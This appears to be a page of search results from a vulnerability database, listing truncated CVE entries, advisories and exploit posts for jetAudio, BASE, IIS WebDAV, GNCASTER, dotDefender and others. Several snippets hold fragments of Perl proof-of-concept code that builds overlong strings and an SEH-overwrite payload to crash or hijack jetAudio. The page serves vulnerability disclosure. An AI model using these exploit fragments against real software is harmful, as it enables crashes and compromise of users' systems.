4195 matches found
Authentication flaw
admin.htm in Geo++ GNCASTER 1.4.0.7 and earlier does not properly enforce HTTP Digest Authentication, which allows remote authenticated users to use HTTP Basic Authentication, bypassing intended server policy...
CVE-2010-0550
admin.htm in Geo++ GNCASTER 1.4.0.7 and earlier does not properly enforce HTTP Digest Authentication, which allows remote authenticated users to use HTTP Basic Authentication, bypassing intended server policy...
MS09-020 IIS6 WebDAV Unicode Auth Bypass Directory Scanner
This module is based on et's HTTP Directory Scanner module, with one exception. Where authentication is required, it attempts to bypass authentication using the WebDAV IIS6 Unicode vulnerability discovered by Kingcope. The vulnerability appears to be exploitable where WebDAV is enabled on the IIS...
Wodig 4.1.3 Access free version (UTF-8) upload vulnerability - vulnerability warning - the black bar safety net
1. In upload/uploadimage.asp and Mutiuploadimage.asp, the userid is obtained from the cookie and put in the session, to be used as the path. ASP/Visual Basic code: loadsrc="/UploadFile/"&Request.Cookies("UserID")&"/" 'if the website is not put in with the directory, please/UploadFile before adding you to...
Wodig 4.1.3 Access free version (UTF-8) upload vulnerability - vulnerability warning - the black bar safety net
Author: unknown 1. In upload/uploadimage.asp and Mutiuploadimage.asp, the userid is obtained from the cookie and put in the session, to be used as the path. ASP/Visual Basic code: loadsrc="/UploadFile/"&Request.Cookies("UserID")&"/" 'if the website is not put in with the directory, please/UploadFile before...
jetAudio 8.0.0.2 Basic - .m3u Local Stack Overflow
jetAudio 8.0.0.2 Basic - .m3u Local Stack Overflow !/usr/bin/perl Title: jetAudio 8.0.0.2 Basic m3u Stack Overflow Exploit Author: cr4wl3r Tested: Windows xpsp2 my $file="b00m.m3u"; my $header = "http://"; my $junk = "A" x 1017; my $nseh = "\xeb\x06\x90\x90"; my $seh = pack'V',0x01221045; my...
jetAudio 8.0.0.2 Basic - '.asx' Local Crash
!/usr/bin/perl Title: jetAudio 8.0.0.2 Basic Local Crash Exploit Author: cr4wl3r Platform: Windows my $file= "crash.asx"; my $boom= "http://"."AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" x 5000; open$FILE,"$file"; print $FILE "$boom"; close$FILE; print "Done..!\n";...
iPhone / iPod - Udisk FTP Basic Edition Remote 0day DoS Exploit
Exploit for unknown platform in category dos / poc =================================================================== Apple iPhone/iPod - Udisk FTP Basic Edition Remote 0day DoS Exploit ===================================================================...
iOS Udisk FTP Basic Edition - Remote Denial of Service
!/usr/bin/python Apple Iphone/Ipod - Udisk FTP Basic Edition Remote 0day DOS exploit Found by: Steven Seeley mrme seeleymagic at hotmail dot com Homepage: http://6tags.com/n/ Price: $4.99 Download: From the app store use your itunes account Tested on: Iphone 3G - firmware 3.1.2 Darwin kernel Gree...
CVE-2009-4591
SQL injection vulnerability in Basic Analysis and Security Engine (BASE) before 1.4.4 allows remote attackers to execute arbitrary SQL commands via unspecified vectors...
CVE-2009-4592
BASE prior to 1.4.4 is affected by CVE-2009-4592: an unspecified vulnerability in base_local_rules.php allows remote attackers to include arbitrary local files via unknown vectors. The OpenVAS entries also describe multiple input-validation vulnerabilities in BASE before 1.4.4, including local fi...
CVE-2009-4592
Unspecified vulnerability in base_local_rules.php in Basic Analysis and Security Engine (BASE) before 1.4.4 allows remote attackers to include arbitrary local files via unknown vectors...
ACTCMS injection vulnerability - vulnerability warning - the black bar safety net
An ASP CMS program. Not many people use it. Googling the keyword “Copyright @ 2006 www.actcms.com” does not return many results. Today I looked at the code. Substantially all of the parameters have been filtered. But there is a small problem in the vote feature, in the /plus/vote/vote.asp page. The code is a...
jetAudio Basic 7.5.5.25 Buffer Overflow
!/user/bin/perl Author: D3V!L FUCKER Version: jetAudio v 7.5.5.25 Basic Tested on: windows vista sp0 Code : my $file= "crash.asx"; my $boom= "http://"."AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" x 5000; open$FILE,"$file"; print $FILE "$boom"; close$FILE; print...
jetAudio 8.0.0.0 - '.asx' Basic Local Crash (PoC)
!/user/bin/perl Exploit Title: Local Crash Poc Date: Fri/Dec/25/2009 Author: D3V!L FUCKER Software Link: http://www.jetaudio.com Version: jetAudio v 8.0.0.0 Basic Tested on: windows vista sp0 Code : my $file= "crash.asx"; my $boom=...
JetAudio Basic 7.5.5.25 - '.asx' Buffer Overflow (PoC)
!/user/bin/perl Author: D3V!L FUCKER Version: jetAudio v 7.5.5.25 Basic Tested on: windows vista sp0 Code : my $file= "crash.asx"; my $boom= "http://"."AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" x 5000; open$FILE,"$file"; print $FILE "$boom"; close$FILE; print...
php 5.1.5 basic-functions.c Privilege Escalation Vulnerability
No description provided by source...
New Security Consortium to Focus on Long-Term Projects
The three universities involved in the security consortium put together this week by Northrop Grumman will have wide latitude to pursue research projects as they see fit and will be under no obligation to work only on technology that fits Northrop’s future plans. The researchers, in fact, will be...
Remote Command Execution in dotDefender Site Management
Problem Description =================== A remote command execution vulnerability exists in the dotDefender 3.8-5 Site Management. dotDefender [1] is a web application firewall (WAF) which 'prevents hackers from attacking your website.' Technical Details ================= The Site Management applicati...
Microsoft Visual Basic VBP Buffer Overflow
This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core' class Metasploit3 'Microsoft Visual...